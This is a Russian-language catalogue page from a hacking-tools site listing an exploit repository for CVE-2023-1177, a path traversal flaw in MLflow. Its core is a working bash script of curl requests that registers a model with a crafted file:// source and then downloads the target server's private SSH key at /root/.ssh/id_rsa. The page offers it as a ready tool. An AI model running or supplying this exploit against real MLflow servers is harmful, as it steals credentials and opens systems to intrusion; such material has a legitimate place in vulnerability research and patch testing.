Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-1177 — MLFlow Path Traversal | Kitploit
Инструменты/GitHubGitHub/charlesgargasson/cve-2023-1177
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubcharlesgargasson/cve-2023-1177

CVE-2023-1177

MLFlow Path Traversal

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

############# CVE-2023-1177 #############

| | Обход пути MLFlow | Протестировано на MLflow 2.2.0 | src: https://github.com/iumiro/CVE-2023-1177-MLFlow |

.. code-block:: bash

#!/bin/bash RAND="EXPLOIT-$((1+$RANDOM%9999))" URL="http://172.17.0.2:6001" FILE='/root/.ssh/id_rsa' curl -vX POST "$URL/ajax-api/2.0/mlflow/registered-models/create" -d "{"name":"$RAND"}" -H "Content-Type: application/json" curl -vX POST "$URL/ajax-api/2.0/mlflow/model-versions/create" -d "{"name":"$RAND","source":"file://%00${FILE%/}/"}" -H "Content-Type: application/json" curl -v "$URL/model-versions/get-artifact?path=${FILE##/}&name=$RAND&version=1"

|

Скачать инструмент